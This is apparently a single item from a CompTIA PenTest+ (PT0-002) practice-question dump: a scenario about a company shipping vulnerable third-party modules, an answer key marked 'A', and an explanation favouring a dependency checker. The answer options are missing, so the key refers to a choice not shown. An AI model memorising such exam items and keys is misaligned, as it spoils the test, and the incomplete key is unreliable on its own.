CompTIA PenTest+ Certification: CompTIA.PT0-002.v2024-11-29.q144

Question 1/144

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

Correct Answer: A
Adding a dependency checker to the toolchain is the best recommendation for a company that has been including vulnerable third-party modules in multiple products. A dependency checker analyzes a software project's dependencies and identifies any with known vulnerabilities or outdated versions, which helps developers update or replace the vulnerable modules before the products are deployed.
